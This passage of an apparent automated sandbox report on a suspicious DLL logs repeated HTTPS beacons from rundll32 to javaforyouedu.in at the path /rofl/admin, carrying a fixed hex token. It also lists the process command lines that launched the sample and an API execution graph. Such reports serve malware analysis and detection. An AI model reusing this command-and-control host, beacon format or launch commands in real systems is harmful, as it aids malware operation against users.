      Connection: close
      2024-08-28 11:39:54 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      19192.168.2.44975643.206.237.1924437500C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:40:01 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:40:01 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:40:01 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:40:01 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:40:01 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      20192.168.2.44975743.206.237.1924437500C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:40:20 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:40:20 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:40:20 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:40:20 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:40:20 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      21192.168.2.44975943.206.237.1924437372C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:40:22 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:40:22 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:40:23 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:40:23 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:40:23 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      22192.168.2.44975843.206.237.1924437396C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:40:22 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:40:22 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:40:23 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:40:23 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:40:23 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      23192.168.2.44976043.206.237.1924437500C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:40:46 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:40:46 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:40:47 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:40:47 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:40:47 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      24192.168.2.44976143.206.237.1924437396C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:40:53 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:40:53 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:40:53 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:40:53 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:40:53 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      25192.168.2.44976243.206.237.1924437372C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:40:53 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:40:53 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:40:53 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:40:53 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:40:53 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      26192.168.2.44976343.206.237.1924437500C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:41:08 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:41:08 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:41:08 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:41:08 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:41:08 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      27192.168.2.44976543.206.237.1924437372C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:41:19 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:41:19 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:41:19 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:41:19 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:41:19 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      28192.168.2.44976443.206.237.1924437396C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:41:19 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:41:19 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:41:19 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:41:19 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:41:19 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      29192.168.2.44976643.206.237.1924437500C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:41:33 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:41:33 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:41:33 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:41:33 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:41:33 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      30192.168.2.44976743.206.237.1924437372C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:41:49 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:41:49 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:41:50 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:41:50 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:41:50 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      31192.168.2.44976843.206.237.1924437396C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:41:49 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:41:49 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:41:50 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:41:50 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:41:50 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      32192.168.2.44976943.206.237.1924437500C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:42:00 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:42:00 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:42:01 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:42:00 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:42:01 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:07:37:54
      Start date:28/08/2024
      Path:C:\Windows\System32\loaddll64.exe
      Wow64 process (32bit):false
      Commandline:loaddll64.exe "C:\Users\user\Desktop\IMS64.dll.dll"
      Imagebase:0x7ff697fd0000
      File size:165'888 bytes
      MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:1
      Start time:07:37:54
      Start date:28/08/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7699e0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:false

      Target ID:2
      Start time:07:37:54
      Start date:28/08/2024
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",#1
      Imagebase:0x7ff749ee0000
      File size:289'792 bytes
      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:false

      Target ID:3
      Start time:07:37:54
      Start date:28/08/2024
      Path:C:\Windows\System32\rundll32.exe
      Wow64 process (32bit):false
      Commandline:rundll32.exe C:\Users\user\Desktop\IMS64.dll.dll,main
      Imagebase:0x7ff73f1e0000
      File size:71'680 bytes
      MD5 hash:EF3179D498793BF4234F708D3BE28633
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:false

      Target ID:4
      Start time:07:37:54
      Start date:28/08/2024
      Path:C:\Windows\System32\rundll32.exe
      Wow64 process (32bit):false
      Commandline:rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",#1
      Imagebase:0x7ff73f1e0000
      File size:71'680 bytes
      MD5 hash:EF3179D498793BF4234F708D3BE28633
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:false

      Target ID:5
      Start time:07:37:57
      Start date:28/08/2024
      Path:C:\Windows\System32\rundll32.exe
      Wow64 process (32bit):false
      Commandline:rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",main
      Imagebase:0x7ff73f1e0000
      File size:71'680 bytes
      MD5 hash:EF3179D498793BF4234F708D3BE28633
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:false

      Reset < >

        Execution Graph

        Execution Coverage:14.9%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:0%
        Total number of Nodes:83
        Total number of Limit Nodes:0
        execution_graph 519 7ffe13301b46 520 7ffe13301b80 calloc 519->520 521 7ffe13301b6c 519->521 520->521 522 7ffe13301b97 EnterCriticalSection LeaveCriticalSection 520->522 522->521 459 7ffe13301df0 460 7ffe13301e05 459->460 461 7ffe13301e76 460->461 462 7ffe13301e61 strncmp 460->462 462->460 462->461 463 7ffe133014f0 465 7ffe13301508 463->465 464 7ffe13301518 465->464 468 7ffe13301c70 465->468 467 7ffe13301565 469 7ffe13301c84 468->469 470 7ffe13301d30 468->470 471 7ffe13301c8a 469->471 472 7ffe13301cd0 469->472 474 7ffe13301c98 469->474 470->467 473 7ffe13301d50 InitializeCriticalSection 471->473 471->474 472->474 475 7ffe13301d09 DeleteCriticalSection 472->475 476 7ffe13301cf8 free 472->476 473->474 474->467 475->474 476->475 476->476 477 7ffe133011e0 478 7ffe13301268 477->478 480 7ffe13301208 477->480 479 7ffe1330127d 478->479 478->480 481 7ffe13301010 5 API calls 479->481 486 7ffe13301241 480->486 489 7ffe13301010 480->489 482 7ffe13301282 481->482 484 7ffe133012d0 482->484 482->486 487 7ffe13301297 482->487 485 7ffe13301010 5 API calls 484->485 484->486 485->486 487->486 488 7ffe13301010 5 API calls 487->488 488->486 490 7ffe13301031 489->490 494 7ffe133010b0 489->494 491 7ffe13301094 490->491 492 7ffe13301078 490->492 493 7ffe13301060 Sleep 490->493 491->486 496 7ffe1330108a _amsg_exit 492->496 497 7ffe13301150 492->497 493->490 494->491 495 7ffe133010f6 494->495 498 7ffe133010e1 Sleep 494->498 495->491 500 7ffe13301190 _initterm 495->500 496->491 501 7ffe13302300 497->501 498->494 500->491 504 7ffe1330231a 501->504 502 7ffe13302363 502->491 503 7ffe1330235b free 503->502 504->502 504->503 505 7ffe13301360 506 7ffe13302220 505->506 507 7ffe13302272 506->507 508 7ffe1330223e _lock 506->508 511 7ffe1330224e 508->511 509 7ffe1330225b _unlock 509->507 510 7ffe133022e6 _unlock 510->507 511->509 511->510 512 7ffe133022a1 511->512 512->509 513 7ffe13301bd0 514 7ffe13301bf8 EnterCriticalSection 513->514 515 7ffe13301be8 513->515 516 7ffe13301c43 LeaveCriticalSection 514->516 517 7ffe13301c14 514->517 517->516 518 7ffe13301c3e free 517->518 518->516 523 7ffe133014c0 524 7ffe133014cd 523->524 525 7ffe13301c70 3 API calls 524->525 526 7ffe133014d1 524->526 527 7ffe133014e5 525->527 528 7ffe13301600 534 7ffe1330161f 528->534 529 7ffe133016cc 530 7ffe13301752 531 7ffe13301590 3 API calls 530->531 532 7ffe13301761 531->532 533 7ffe1330168d VirtualQuery 533->534 535 7ffe13301737 533->535 534->529 534->530 534->533 537 7ffe133016e0 VirtualProtect 534->537 536 7ffe13301590 3 API calls 535->536 536->530 537->529 538 7ffe13301716 GetLastError 537->538 540 7ffe13301590 538->540 543 7ffe133015bd 540->543 541 7ffe1330168d VirtualQuery 542 7ffe133016cc 541->542 541->543 542->534 543->541 543->542 544 7ffe133016e0 VirtualProtect 543->544 544->542 545 7ffe13301716 GetLastError 544->545 545->543

        Callgraph

        • Executed
        • Not Executed
        • Opacity -> Relevance
        • Disassembly available
        callgraph 0 Function_00007FFE133023F0 33 Function_00007FFE13302550 0->33 1 Function_00007FFE13301DF0 2 Function_00007FFE13302470 3 Function_00007FFE13301370 4 Function_00007FFE13302170 5 Function_00007FFE133020B0 6 Function_00007FFE13301C70 6->4 7 Function_00007FFE133014F0 7->6 8 Function_00007FFE13301D70 9 Function_00007FFE133024B0 10 Function_00007FFE13301926 11 Function_00007FFE13301AE5 12 Function_00007FFE13301823 13 Function_00007FFE133024E2 14 Function_00007FFE13302020 15 Function_00007FFE13301F60 16 Function_00007FFE133025E0 16->0 16->2 16->9 18 Function_00007FFE133014A0 16->18 22 Function_00007FFE133024E0 16->22 26 Function_00007FFE13301396 16->26 27 Function_00007FFE13301394 16->27 28 Function_00007FFE13301392 16->28 35 Function_00007FFE13301390 16->35 37 Function_00007FFE13302590 16->37 42 Function_00007FFE133025C0 16->42 17 Function_00007FFE133011E0 17->18 19 Function_00007FFE133023E0 17->19 36 Function_00007FFE13301010 17->36 41 Function_00007FFE133021C0 17->41 20 Function_00007FFE13301FE0 21 Function_00007FFE13301360 23 Function_00007FFE13301EA0 24 Function_00007FFE13301F20 25 Function_00007FFE13301DA0 29 Function_00007FFE13301A92 30 Function_00007FFE133021D0 31 Function_00007FFE133013D0 32 Function_00007FFE13301BD0 34 Function_00007FFE13301590 34->20 34->23 34->30 34->34 45 Function_00007FFE13302300 36->45 38 Function_00007FFE13301B46 39 Function_00007FFE133014C0 39->6 40 Function_00007FFE13301340 43 Function_00007FFE13301000 44 Function_00007FFE13301600 44->20 44->23 44->34 46 Function_00007FFE13302180 47 Function_00007FFE13301580

        Control-flow Graph

        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4122907159.00007FFE13301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFE13300000, based on PE: true
        • Associated: 00000003.00000002.4122892367.00007FFE13300000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4122944958.00007FFE13342000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4122968321.00007FFE13347000.00000004.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_7ffe13300000_rundll32.jbxd
        Similarity
        • API ID:
        • String ID: XVd
        • API String ID: 0-641440733
        • Opcode ID: 895eeefdb8f5bc7f452704ca4a7eee74cac299ba48fdf6b52e29c8c825f5dec9
        • Instruction ID: 0098dc31debc002578bf0be0e692fe7ab04edf9fcb86fe7f4044fbc7df7a3dd7
        • Opcode Fuzzy Hash: 895eeefdb8f5bc7f452704ca4a7eee74cac299ba48fdf6b52e29c8c825f5dec9
        • Instruction Fuzzy Hash: 3B51E622A08B8145EB20DB27B85576F6690FB957B4F008274EEBD57BE6DF3CD0409708
        APIs
        Memory Dump Source
        • Source File: 00000003.00000003.1688223900.000001CDED240000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CDED240000, based on PE: false
        Joe Sandbox IDA Plugin
